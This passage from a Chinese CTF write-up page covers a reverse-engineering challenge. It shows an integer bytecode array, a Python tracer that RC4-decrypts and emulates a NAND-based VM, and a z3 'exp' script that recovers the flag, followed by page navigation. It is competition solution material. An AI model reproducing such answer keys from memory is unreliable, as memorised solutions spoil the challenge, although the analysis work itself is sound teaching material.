2781, 68, 2781, 2781, 111, 243, 2594, 154, 245, 12, 48, 2782, 2782, 3, 244, 2593, 27, 2593, 2783, 170, 12, 2782, 66, 244, 242, 92, 239, 17, 126, 11, 18, 147, 237, 236, 117, 242, 17, 57, 11, 12, 197, 3070, 3071, 23, 245, 18, 160, 18, 18, 228, 243, 3071, 230, 245, 12, 255, 2781, 2781, 231, 244, 2592, 239, 2592, 2782, 126, 12, 2781, 129, 244, 242, 229, 2593, 2783, 243, 11, 2784, 243, 2591, 2590, 79, 242, 2783, 187, 11, 12, 154, 238, 239, 56, 245, 18, 12, 18, 18, 203, 243, 239, 229, 245, 12, 50, 2818, 2818, 137, 244, 236, 136, 236, 18, 134, 12, 2818, 74, 244, 242, 242, 2592, 2782, 199, 11, 2783, 28, 2592, 2593, 136, 242, 2782, 42, 11, 12, 201, 2591, 2590, 127, 245, 2785, 188, 2785, 2785, 117, 243, 2590, 233, 245, 12, 129, 17, 17, 226, 244, 236, 205, 236, 18, 179, 12, 17, 186, 244, 242, 186, 3069, 2819, 255, 11, 18, 52, 237, 236, 122, 242, 2819, 66, 11, 12, 227, 2592, 2593, 151, 245, 2784, 209, 2784, 2784, 214, 243, 2593, 202, 245, 12, 12, 2785, 2785, 177, 244, 2588, 13, 2588, 2786, 150, 12, 2785, 32, 244, 242, 60, 239, 17, 59, 11, 18, 59, 237, 236, 62, 242, 17, 3, 11, 12, 248, 3067, 3066, 229, 245, 18, 220, 18, 18, 193, 243, 3066, 131, 245, 12, 33, 2784, 2784, 223, 244, 2591, 174, 2591, 2785, 142, 12, 2784, 142, 244, 242, 217, 2588, 2786, 30, 11, 2787, 106, 2588, 2589, 14, 12, 2786, 177, 244, 242, 85, 239, 17, 244, 11, 18, 163, 237, 236, 166, 242, 17, 187, 11, 12, 208, 3066, 3067, 134, 245, 18, 255, 18, 18, 248, 243, 3067, 122, 245, 12, 107, 2785, 2785, 115, 244, 2588, 1, 2588, 2786, 60, 12, 2785, 88, 244, 242, 71, 2589, 2787, 39, 11, 2788, 203, 2587, 2586, 206, 242, 2787, 29, 11, 12, 76, 238, 239, 245, 245, 18, 10, 18, 18, 12, 243, 239, 210, 245, 12, 242, 2822, 2822, 235, 244, 236, 233, 236, 18, 69, 12, 2822, 162, 244, 242, 37, 2588, 2786, 148, 11, 2787, 13, 2588, 2589, 14, 12, 2786, 9, 244, 242, 19, 2788, 2788, 14, 244, 2587, 9, 2789, 2789, 9, 243, 2586, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2823, 2823, 14, 244, 236, 9, 18, 18, 9, 243, 3065, 14, 11, 12, 22, 2588, 2589, 9, 11, 2788, 14, 2587, 2586, 14, 12, 2787, 9, 244, 242, 19, 2789, 2789, 14, 244, 2584, 9, 2790, 2790, 9, 243, 2587, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2824, 2824, 14, 244, 236, 9, 18, 18, 9, 243, 3062, 14, 11, 12, 22, 2587, 2586, 9, 11, 2789, 14, 2586, 2587, 14, 12, 2788, 9, 244, 242, 19, 2790, 2790, 14, 244, 2585, 9, 2791, 2791, 9, 243, 2584, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2825, 2825, 14, 244, 236, 9, 18, 18, 9, 243, 3063, 14, 11, 12, 22, 2586, 2587, 9, 11, 2790, 14, 2585, 2584, 14, 12, 2789, 9, 244, 242, 19, 2791, 2791, 14, 244, 2582, 9, 2792, 2792, 9, 243, 2585, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2826, 2826, 14, 244, 236, 9, 18, 18, 9, 243, 3060, 14, 11, 12, 22, 2585, 2584, 9, 11, 2791, 14, 2584, 2585, 14, 12, 2790, 9, 244, 242, 19, 2792, 2792, 14, 244, 2583, 9, 2793, 2793, 9, 243, 2582, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2827, 2827, 14, 244, 236, 9, 18, 18, 9, 243, 3061, 14, 11, 12, 22, 2584, 2585, 9, 11, 2792, 14, 2583, 2582, 14, 12, 2791, 9, 244, 242, 19, 2793, 2793, 14, 244, 2580, 9, 2794, 2794, 9, 243, 2583, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2828, 2828, 14, 244, 236, 9, 18, 18, 9, 243, 3058, 14, 11, 12, 22, 2583, 2582, 9, 11, 2793, 14, 2582, 2583, 14, 12, 2792, 9, 244, 242, 19, 2794, 2794, 14, 244, 2581, 9, 2795, 2795, 9, 243, 2580, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2829, 2829, 14, 244, 236, 9, 18, 18, 9, 243, 3059, 14, 11, 12, 22, 2582, 2583, 9, 11, 2794, 14, 2581, 2580, 14, 12, 2793, 9, 244, 242, 19, 2795, 2795, 14, 244, 2578, 9, 2796, 2796, 9, 243, 2581, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2830, 2830, 14, 244, 236, 9, 18, 18, 9, 243, 3056, 14, 11, 12, 22, 2581, 2580, 9, 11, 2795, 14, 2580, 2581, 14, 12, 2794, 9, 244, 242, 19, 2796, 2796, 14, 244, 2579, 9, 2797, 2797, 9, 243, 2578, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2831, 2831, 14, 244, 236, 9, 18, 18, 9, 243, 3057, 14, 11, 12, 22, 2580, 2581, 9, 11, 2796, 14, 2579, 2578, 14, 12, 2795, 9, 244, 242, 19, 2797, 2797, 14, 244, 2576, 9, 2798, 2798, 9, 243, 2579, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2832, 2832, 14, 244, 236, 9, 18, 18, 9, 243, 3054, 14, 11, 12, 22, 2579, 2578, 9, 11, 2797, 14, 2578, 2579, 14, 12, 2796, 9, 244, 242, 19, 2798, 2798, 14, 244, 2577, 9, 2799, 2799, 9, 243, 2576, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2833, 2833, 14, 244, 236, 9, 18, 18, 9, 243, 3055, 14, 11, 12, 22, 2578, 2579, 9, 11, 2798, 14, 2577, 2576, 14, 12, 2797, 9, 244, 242, 19, 2799, 2799, 14, 244, 2574, 9, 2800, 2800, 9, 243, 2577, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2834, 2834, 14, 244, 236, 9, 18, 18, 9, 243, 3052, 14, 11, 12, 22, 2577, 2576, 9, 11, 2799, 14, 2576, 2577, 14, 12, 2798, 9, 244, 242, 19, 2800, 2800, 14, 244, 2575, 9, 2801, 2801, 9, 243, 2574, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2835, 2835, 14, 244, 236, 9, 18, 18, 9, 243, 3053, 14, 11, 12, 22, 2576, 2577, 9, 11, 2800, 14, 2575, 2574, 14, 12, 2799, 9, 244, 242, 19, 2801, 2801, 14, 244, 2572, 9, 2802, 2802, 9, 243, 2575, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2836, 2836, 14, 244, 236, 9, 18, 18, 9, 243, 3050, 14, 11, 12, 22, 2575, 2574, 9, 11, 2801, 14, 2574, 2575, 14, 12, 2800, 9, 244, 242, 19, 2802, 2802, 14, 244, 2573, 9, 2803, 2803, 9, 243, 2572, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2837, 2837, 14, 244, 236, 9, 18, 18, 9, 243, 3051, 14, 11, 12, 22, 2574, 2575, 9, 11, 2802, 14, 2573, 2572, 14, 12, 2801, 9, 244, 242, 19, 2803, 2803, 14, 244, 2570, 9, 2804, 2804, 9, 243, 2573, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2838, 2838, 14, 244, 236, 9, 18, 18, 9, 243, 3048, 14, 11, 12, 22, 2573, 2572, 9, 11, 2803, 14, 2572, 2573, 14, 12, 2802, 9, 244, 242, 19, 2804, 2804, 14, 244, 2571, 9, 2805, 2805, 9, 243, 2570, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2839, 2839, 14, 244, 236, 9, 18, 18, 9, 243, 3049, 14, 11, 12, 22, 2572, 2573, 9, 11, 2804, 14, 2571, 2570, 14, 12, 2803, 9, 244, 242, 19, 2805, 2805, 14, 244, 2568, 9, 2806, 2806, 9, 243, 2571, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2840, 2840, 14, 244, 236, 9, 18, 18, 9, 243, 3046, 14, 11, 12, 22, 2571, 2570, 9, 11, 2805, 14, 2570, 2571, 14, 12, 2804, 9, 244, 242, 19, 2806, 2806, 14, 244, 2569, 9, 2807, 2807, 9, 243, 2568, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2841, 2841, 14, 244, 236, 9, 18, 18, 9, 243, 3047, 14, 11, 12, 22, 2570, 2571, 9, 11, 2806, 14, 2569, 2568, 14, 12, 2805, 9, 244, 242, 19, 2807, 2807, 14, 244, 2566, 9, 2808, 2808, 9, 243, 2569, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2842, 2842, 14, 244, 236, 9, 18, 18, 9, 243, 3044, 14, 11, 12, 22, 2569, 2568, 9, 11, 2807, 14, 2568, 2569, 14, 12, 2806, 9, 244, 242, 19, 2808, 2808, 14, 244, 2602, 9, 2772, 2772, 9, 243, 2566, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2843, 2843, 14, 244, 236, 9, 18, 18, 9, 243, 3045, 14, 11, 12, 22, 2568, 2569, 9, 11, 2808, 14, 2567, 2566, 14, 12, 2807, 9, 244, 242, 19, 2772, 2772, 14, 244, 2603, 9, 2773, 2773, 9, 243, 2602, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2844, 2844, 14, 244, 236, 9, 18, 18, 9, 243, 3042, 14, 11, 12, 22, 2567, 2566, 9, 11, 2772, 14, 2603, 2602, 14, 12, 2808, 9, 244, 242, 19, 2773, 2773, 14, 244, 2600, 9, 2774, 2774, 9, 243, 2603, 14, 11, 12, 23, 238, 239, 9, 11, 18, 14, 237, 236, 14, 12, 17, 9, 244, 242, 16, 2845, 2845, 14, 244, 236, 9, 18, 18, 9, 243, 3043, 14, 11, 12, 22, 245, 244, 2, 0, 0, 0, 0, 0, 0, 73, 110, 112, 117, 116, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 11, 109, 15, 3, 50, 66, 29, 43, 67, 120, 67, 115, 48, 43, 78, 99, 72, 119, 46, 50, 57, 26, 18, 113, 122, 66, 23, 69, 114, 86, 12, 92, 74, 98, 83, 51, 0, 0]

code_type = c_ushort * len(py_code)
code = code_type(*py_code)
print(len(code))

tmp = (c_ushort * 3)(*[0, 0, 0])

def rc4(idx, length):
    num1 = 0
    num2 = 0
    for i in range(idx, idx + length):
        num1 = (num1 + 1) % 256
        num2 = (num2 + sbox[num1]) % 256
        sbox[num1], sbox[num2] = sbox[num2], sbox[num1]
        index = (sbox[num1] + sbox[num2]) % 256
        code[i] ^= sbox[index]

pc = 0
in_str = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 33]
idx = 0

while(pc < len(code)):
    pc = code[0]
    act = ""
    if code[2] == 1:
        act = "\t\tprint " + chr(code[3])
        code[2] = 0
    elif code[7] == 1:
        act = "\t\tinput code[8]"
        code[8] = in_str[idx]
        idx += 1
        code[7] = 0
    rc4(pc, 3)
    n1 = code[pc]
    n2 = code[pc + 1]
    n3 = code[pc + 2]
    code[0] = pc + 3
    rc4(pc, 3)
    res = c_ushort((code[n1] & code[n2]) ^ 0xffff)
    if n3 == 0:
        print("")
    elif n3 == 19:
        print("")
    code[n3] = (code[n1] & code[n2]) ^ 0xffff
    if n1 != n2:
        print("0x%03x:\t" % pc,f"code[{n3}] = ~(code[{n1}] & code[{n2}])\t", "code[%d] = 0x%04x" % (n3, res.value), end = act + "\n")
    else:
        print("0x%03x:\t" % pc,f"code[{n3}] = ~code[{n1}]\t", "code[%d] = 0x%04x" % (n3, res.value), end = act + "\n")

exp如下

from z3 import *

flag= [BitVec('%d' % i, 8) for i in range(37)]
enc = [36, 11, 109, 15, 3, 50, 66, 29, 43, 67, 120, 67, 115, 48, 43, 78, 99, 72, 119, 46, 50, 57, 26, 18, 113, 122, 66, 23, 69, 114, 86, 12, 92, 74, 98, 83, 51]

s = Solver()

for i in range(0, 37):
    s.add((flag[i] ^ flag[(i + 1) % 37] ^ flag[(i + 2) % 37] ^ flag[(i + 3) % 37]) == enc[i])
    s.add(flag[i] > 0x20)
    s.add(flag[i] < 0x7f)

s.add(flag[36] == 126)

if s.check() == sat:
    result = s.model()
    for i in flag:
        print(chr(result[i].as_long()), end = "")
else:
    print("NO")

Web

ezjava

Escape Plan

d3node

d3cloud

Misc

h3d3checkin

Questionnaire

d3readfile

d3gif

d3image

d3craft

给node-minecraft-protocol打补丁支持1.19.4

下载mc源码

漏洞分析

exp

Re

d3recover

d3sky

2023 红明谷杯初赛 Writeup by X1cT34m

第十六届全国大学生信息安全竞赛初赛 Writeup by X1cT34m

发表评论点击这里取消回复。

文章目录

热门文章

RWCTF 2024 体验赛 Writeup

最新评论

标签云

D^3CTF Writeup by X1cT34m

Web

ezjava

Escape Plan

d3node

d3cloud

Misc

h3d3checkin

Questionnaire

d3readfile

d3gif

d3image

d3craft

给node-minecraft-protocol打补丁支持1.19.4

下载mc源码

漏洞分析

exp

Re

d3recover

d3sky

2023 红明谷杯 初赛 Writeup by X1cT34m

第十六届全国大学生信息安全竞赛 初赛 Writeup by X1cT34m

猜你喜欢

RWCTF 2024 体验赛 Writeup

2023 鹏城杯 初赛 Writeup by X1cT34m

2023 中华武数杯全国网络攻防精英赛 Writeup by X1cT34m

第十六届全国大学生信息安全竞赛 初赛 Writeup by X1cT34m

2023 红明谷杯 初赛 Writeup by X1cT34m

XCTF Final 7th Writeup by X1cT34m

发表评论 点击这里取消回复。

文章目录

热门文章

RWCTF 2024 体验赛 Writeup

最新评论

标签云

关注我们的公众号

2023 红明谷杯初赛 Writeup by X1cT34m

第十六届全国大学生信息安全竞赛初赛 Writeup by X1cT34m

2023 鹏城杯初赛 Writeup by X1cT34m

第十六届全国大学生信息安全竞赛初赛 Writeup by X1cT34m

2023 红明谷杯初赛 Writeup by X1cT34m

发表评论点击这里取消回复。